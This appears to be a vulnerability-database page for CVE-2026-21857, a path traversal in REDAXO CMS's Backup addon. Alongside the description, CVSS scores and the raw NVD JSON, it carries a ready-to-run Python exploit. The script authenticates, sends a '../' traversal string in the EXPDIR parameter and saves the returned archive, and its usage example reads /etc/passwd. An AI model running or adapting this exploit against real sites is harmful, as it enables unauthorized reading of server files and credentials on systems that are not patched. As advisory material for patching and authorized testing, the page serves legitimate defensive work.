CVE-2026-21857

Description

REDAXO is a PHP-based content management system. Prior to version 5.20.2, authenticated users with backup permissions can read arbitrary files within the webroot via path traversal in the Backup addon's file export functionality. The Backup addon does not validate the `EXPDIR` POST parameter against the UI-generated allowlist of permitted directories. An attacker can supply relative paths containing `../` sequences (or even absolute paths inside the document root) to include any readable file in the generated `.tar.gz` archive. Version 5.20.2 fixes this issue.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:redaxo:redaxo:*:*:*:*:*:*:*:* - VULNERABLE

REDAXO CMS < 5.20.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2026-21857 PoC - REDAXO Backup Path Traversal
# Target: REDAXO CMS < 5.20.2

def exploit(target_url, username, password, file_to_read):
    """
    Exploit path traversal in REDAXO Backup addon
    """
    session = requests.Session()
    
    # Step 1: Login to REDAXO
    login_url = f"{target_url}/redaxo/index.php"
    login_data = {
        'form_id': 'login',
        'login': username,
        'password': password
    }
    resp = session.post(login_url, data=login_data)
    
    if 'login' in resp.text.lower():
        print("[-] Login failed")
        return False
    
    print("[+] Login successful")
    
    # Step 2: Exploit path traversal via EXPDIR parameter
    backup_url = f"{target_url}/redaxo/index.php?page=backup/export"
    
    # Path traversal payload to read arbitrary file
    # Adjust the number of ../ based on target configuration
    traversal_path = "../../../../../../" + file_to_read
    
    exploit_data = {
        'EXPDIR': traversal_path,
        'send': '1'
    }
    
    print(f"[*] Sending exploit request for: {file_to_read}")
    resp = session.post(backup_url, data=exploit_data)
    
    # Check if we got a tar.gz file back
    if resp.headers.get('Content-Type') == 'application/gzip' or \
       resp.headers.get('Content-Type') == 'application/x-gzip' or \
       '.tar.gz' in resp.headers.get('Content-Disposition', ''):
        print("[+] Exploit successful! File archive received.")
        # Save the archive
        with open('exploit_output.tar.gz', 'wb') as f:
            f.write(resp.content)
        print("[+] Archive saved as exploit_output.tar.gz")
        return True
    else:
        print("[-] Exploit may have failed or file not found")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 5:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> <file_path>")
        print("Example: python exploit.py http://target.com admin admin /etc/passwd")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    file_path = sys.argv[4]
    
    exploit(target, user, pwd, file_path)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21857
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21857
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21857/
[4] VulDB https://vuldb.com/cve/CVE-2026-21857
[5] https://github.com/redaxo/redaxo/releases/tag/5.20.2
[6] https://github.com/redaxo/redaxo/security/advisories/GHSA-824x-88xg-cwrv
[7] https://github.com/redaxo/redaxo/security/advisories/GHSA-824x-88xg-cwrv

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21857", "sourceIdentifier": "[email protected]", "published": "2026-01-07T23:15:50.830", "lastModified": "2026-01-20T18:49:29.420", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "REDAXO is a PHP-based content management system. Prior to version 5.20.2, authenticated users with backup permissions can read arbitrary files within the webroot via path traversal in the Backup addon's file export functionality. The Backup addon does not validate the `EXPDIR` POST parameter against the UI-generated allowlist of permitted directories. An attacker can supply relative paths containing `../` sequences (or even absolute paths inside the document root) to include any readable file in the generated `.tar.gz` archive. Version 5.20.2 fixes this issue."}, {"lang": "es", "value": "REDAXO es un sistema de gestión de contenido basado en PHP. Antes de la versión 5.20.2, los usuarios autenticados con permisos de copia de seguridad pueden leer archivos arbitrarios dentro del directorio raíz web (webroot) mediante salto de ruta en la funcionalidad de exportación de archivos del complemento Backup. El complemento Backup no valida el parámetro POST 'EXPDIR' contra la lista blanca de directorios permitidos generada por la interfaz de usuario. Un atacante puede proporcionar rutas relativas que contengan secuencias '../' (o incluso rutas absolutas dentro del directorio raíz del documento) para incluir cualquier archivo legible en el archivo '.tar.gz' generado. La versión 5.20.2 corrige este problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-24"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redaxo:redaxo:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.20.2", "matchCriteriaId": "5BB9DA06-A124-4435-A4F0-D14EC2F291B8"}]}]}], "references": [{"url": "https://github.com/redaxo/redaxo/releases/tag/5.20.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/redaxo/redaxo/security/advisories/GHSA-824x-88xg-cwrv", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/redaxo/redaxo/security/advisories/GHSA-824x-88xg-cwrv", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}